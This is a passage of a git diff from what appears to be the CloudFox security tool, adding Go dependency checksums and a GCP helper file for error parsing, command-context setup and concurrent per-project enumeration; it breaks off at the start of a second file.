h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= @@ -403,6 +450,7 @@ github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UV github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= @@ -413,8 +461,12 @@ github.com/zeebo/assert v1.3.0 h1:g7C04CbJuIDKNPFHmsk4hwZDO5O+kntRxzaUoNXj+IQ= github.com/zeebo/assert v1.3.0/go.mod h1:Pq9JiuJQpG8JLJdtkwrJESF0Foym2/D9XMU5ciN/wJ0= github.com/zeebo/xxh3 v1.0.2 h1:xZmwmqxHZA8AI603jOQ0tMqmBr9lPeFwGg6d+xy9DC0= github.com/zeebo/xxh3 v1.0.2/go.mod h1:5NWz9Sef7zIDm2JHfFlcQvNekmcEl9ekUZQQKCYaDcA= +go.einride.tech/aip v0.73.0 h1:bPo4oqBo2ZQeBKo4ZzLb1kxYXTY1ysJhpvQyfuGzvps= +go.einride.tech/aip v0.73.0/go.mod h1:Mj7rFbmXEgw0dq1dqJ7JGMvYCZZVxmGOR3S4ZcV5LvQ= go.mongodb.org/mongo-driver v1.17.6 h1:87JUG1wZfWsr6rIz3ZmpH90rL5tea7O3IHuSwHUpsss= go.mongodb.org/mongo-driver v1.17.6/go.mod h1:Hy04i7O2kC4RS06ZrhPRqj/u4DTYkFDAAccj+rVKqgQ= +go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= +go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= @@ -437,18 +489,29 @@ go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6 go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4= golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9 h1:MDfG8Cvcqlt9XXrmEiD4epKn7VJHZO84hejP9Jmp0MM= golang.org/x/exp v0.0.0-20251209150349-8475f28825e9/go.mod h1:EPRbTFwzwjXj9NpYyyrvenVh9Y+GFeEvMNh7Xuz7xgU= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI= golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= @@ -456,14 +519,20 @@ golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= @@ -499,26 +568,50 @@ golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.14.0 h1:MRx4UaLrDotUKUdCIqzPC48t1Y9hANFKIRpNx+Te8PI= golang.org/x/time v0.14.0/go.mod h1:eL/Oa2bBBK0TkX57Fyni+NgnyQQN4LitPmob2Hjnqw4= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= +golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= +golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA= golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.257.0 h1:8Y0lzvHlZps53PEaw+G29SsQIkuKrumGWs9puiexNAA= google.golang.org/api v0.257.0/go.mod h1:4eJrr+vbVaZSqs7vovFd1Jb/A6ml6iw2e6FBYf3GAO4= +google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= +google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= +google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= +google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217 h1:GvESR9BIyHUahIb0NcTum6itIWtdoglGX+rnGxm2934= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:yJ2HH4EHEDTd3JiLmhds6NkJ17ITVYOdV3m3VKOnws0= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.77.0 h1:wVVY6/8cGA6vvffn+wWK5ToddbgdU3d8MNENr4evgXM= google.golang.org/grpc v1.77.0/go.mod h1:z0BY1iVj0q8E1uSQCjL9cppRj+gnZjzDnzV0dHhrNig= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -529,3 +622,5 @@ gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/internal/gcp/base.go b/internal/gcp/base.go new file mode 100644 index 00000000..5eef0901 --- /dev/null +++ b/internal/gcp/base.go @@ -0,0 +1,391 @@ +package gcpinternal + +import ( + "context" + "errors" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + "github.com/spf13/cobra" + "google.golang.org/api/googleapi" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// ------------------------------ +// Common GCP API Error Types +// ------------------------------ +var ( + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") +) + +// ParseGCPError converts GCP API errors into cleaner, standardized error types +// This should be used by all GCP service modules for consistent error handling +// Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error) +func ParseGCPError(err error, apiName string) error { + if err == nil { + return nil + } + + // Check for gRPC status errors (used by Cloud Asset, Spanner, and other gRPC-based APIs) + if grpcStatus, ok := status.FromError(err); ok { + errStr := err.Error() + + switch grpcStatus.Code() { + case codes.PermissionDenied: + // Check for SERVICE_DISABLED in error details or message + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for quota project requirement (API not enabled or misconfigured) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (enable API or set quota project)", ErrAPINotEnabled, apiName) + } + return ErrPermissionDenied + + case codes.NotFound: + return ErrNotFound + + case codes.Unauthenticated: + return fmt.Errorf("authentication failed - check credentials") + + case codes.ResourceExhausted: + return fmt.Errorf("rate limited - too many requests") + + case codes.Unavailable, codes.Internal: + return fmt.Errorf("GCP service error: %s", grpcStatus.Message()) + + case codes.InvalidArgument: + return fmt.Errorf("bad request: %s", grpcStatus.Message()) + } + + // Default: return cleaner error message + return fmt.Errorf("gRPC error (%s): %s", grpcStatus.Code().String(), grpcStatus.Message()) + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + errStr := googleErr.Error() + + switch googleErr.Code { + case 403: + // Check for SERVICE_DISABLED first - this is usually the root cause + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Permission denied + if strings.Contains(errStr, "PERMISSION_DENIED") || + strings.Contains(errStr, "does not have") || + strings.Contains(errStr, "permission") { + return ErrPermissionDenied + } + // Generic 403 + return ErrPermissionDenied + + case 404: + return ErrNotFound + + case 400: + return fmt.Errorf("bad request: %s", googleErr.Message) + + case 429: + return fmt.Errorf("rate limited - too many requests") + + case 500, 502, 503, 504: + return fmt.Errorf("GCP service error (code %d)", googleErr.Code) + } + + // Default: return cleaner error message + return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) + } + + // Fallback: check error string for common patterns + errStr := err.Error() + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { + return ErrPermissionDenied + } + + return err +} + +// HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue +// Returns false if the error is fatal and the caller should stop processing +func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { + if err == nil { + return true // No error, continue + } + + switch { + case errors.Is(err, ErrAPINotEnabled): + logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) + return false // Can't continue without API enabled + + case errors.Is(err, ErrPermissionDenied): + logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(err, ErrNotFound): + // Not found is often expected, don't log as error + return true + + default: + logger.ErrorM(fmt.Sprintf("%s: %v", resourceDesc, err), moduleName) + return true // Continue with other resources + } +} + +// ------------------------------ +// CommandContext holds all common initialization data for GCP commands +// ------------------------------ +type CommandContext struct { + // Context and logger + Ctx context.Context + Logger internal.Logger + + // Project information + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration flags + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int +} + +// ------------------------------ +// BaseGCPModule - Embeddable struct with common fields for all GCP modules +// ------------------------------ +// This struct eliminates duplicate field declarations across modules. +// Modules embed this struct instead of declaring these fields individually. +// +// Usage: +// +// type BucketsModule struct { +// gcpinternal.BaseGCPModule // Embed the base fields +// +// // Module-specific fields +// Buckets []BucketInfo +// mu sync.Mutex +// } +type BaseGCPModule struct { + // Project and identity + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + + // Progress tracking (AWS/Azure style) + CommandCounter internal.CommandCounter +} + +// GetProjectName returns the display name for a project ID, falling back to the ID if not found +func (b *BaseGCPModule) GetProjectName(projectID string) string { + if b.ProjectNames != nil { + if name, ok := b.ProjectNames[projectID]; ok { + return name + } + } + return projectID +} + +// ------------------------------ +// NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext +// ------------------------------ +func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { + return BaseGCPModule{ + ProjectIDs: cmdCtx.ProjectIDs, + ProjectNames: cmdCtx.ProjectNames, + Account: cmdCtx.Account, + Verbosity: cmdCtx.Verbosity, + WrapTable: cmdCtx.WrapTable, + OutputDirectory: cmdCtx.OutputDirectory, + Format: cmdCtx.Format, + Goroutines: cmdCtx.Goroutines, + } +} + +// ------------------------------ +// ProjectProcessor - Callback function type for processing individual projects +// ------------------------------ +type ProjectProcessor func(ctx context.Context, projectID string, logger internal.Logger) + +// ------------------------------ +// RunProjectEnumeration - Orchestrates enumeration across multiple projects with concurrency +// ------------------------------ +// This method centralizes the project enumeration orchestration pattern. +// It handles WaitGroup, semaphore, spinner, and CommandCounter management automatically. +// +// Usage: +// +// func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) +// m.writeOutput(ctx, logger) +// } +func (b *BaseGCPModule) RunProjectEnumeration( + ctx context.Context, + logger internal.Logger, + projectIDs []string, + moduleName string, + processor ProjectProcessor, +) { + logger.InfoM(fmt.Sprintf("Enumerating resources for %d project(s)", len(projectIDs)), moduleName) + + // Setup synchronization primitives + var wg sync.WaitGroup + semaphore := make(chan struct{}, b.Goroutines) + + // Start progress spinner + spinnerDone := make(chan bool) + go internal.SpinUntil(moduleName, &b.CommandCounter, spinnerDone, "projects") + + // Process each project with goroutines + for _, projectID := range projectIDs { + b.CommandCounter.Total++ + b.CommandCounter.Pending++ + wg.Add(1) + + go func(project string) { + defer func() { + b.CommandCounter.Executing-- + b.CommandCounter.Complete++ + wg.Done() + }() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + b.CommandCounter.Pending-- + b.CommandCounter.Executing++ + + // Call the module-specific processor + processor(ctx, project, logger) + }(projectID) + } + + // Wait for all projects to complete + wg.Wait() + + // Stop spinner + spinnerDone <- true + <-spinnerDone +} + +// ------------------------------ +// parseMultiValueFlag parses a flag value that can contain comma-separated +// and/or space-separated values +// ------------------------------ +func parseMultiValueFlag(flagValue string) []string { + if flagValue == "" { + return nil + } + + // Replace commas with spaces, then split by whitespace + normalized := strings.ReplaceAll(flagValue, ",", " ") + fields := strings.Fields(normalized) + + // Deduplicate while preserving order + seen := make(map[string]bool) + result := []string{} + for _, field := range fields { + if !seen[field] { + seen[field] = true + result = append(result, field) + } + } + return result +} + +// ------------------------------ +// InitializeCommandContext - Eliminates duplicate initialization code across commands +// ------------------------------ +// This helper extracts flags, resolves projects and account info. +// +// Usage: +// +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) +// if err != nil { +// return // error already logged +// } +func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandContext, error) { + ctx := cmd.Context() + logger := internal.NewLogger() + + // -------------------- Extract flags -------------------- + parentCmd := cmd.Parent() + verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") + wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") + outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") + format, _ := parentCmd.PersistentFlags().GetString("output") + + // Default to "all" format if not set (GCP doesn't expose this flag yet) + if format == "" { + format = "all" + } + + // -------------------- Get project IDs from context -------------------- + var projectIDs []string + if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { + projectIDs = value + } else { + logger.ErrorM("Could not retrieve projectIDs from context or value is empty", moduleName) + return nil, fmt.Errorf("no project IDs provided") + } + + // -------------------- Get project names from context -------------------- + var projectNames map[string]string + if value, ok := ctx.Value("projectNames").(map[string]string); ok { + projectNames = value + } else { + // Initialize empty map if not provided - modules can still work without names + projectNames = make(map[string]string) + for _, id := range projectIDs { + projectNames[id] = id // fallback to using ID as name + } + } + + // -------------------- Get account from context -------------------- + var account string + if value, ok := ctx.Value("account").(string); ok { + account = value + } else { + logger.ErrorM("Could not retrieve account email from context", moduleName) + // Don't fail - some modules can continue without account info + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) + } + + // -------------------- Build and return context -------------------- + return &CommandContext{ + Ctx: ctx, + Logger: logger, + ProjectIDs: projectIDs, + ProjectNames: projectNames, + Account: account, + Verbosity: verbosity, + WrapTable: wrap, + OutputDirectory: outputDirectory, + Format: format, + Goroutines: 5, // Default concurrency + }, nil +} diff --git a/internal/gcp/session.go b/internal/gcp/session.go new file mode 100644 index 00000000..81640420 --- /dev/null +++ b/internal/gcp/session.go @@ -0,0 +1,442 @@ +package 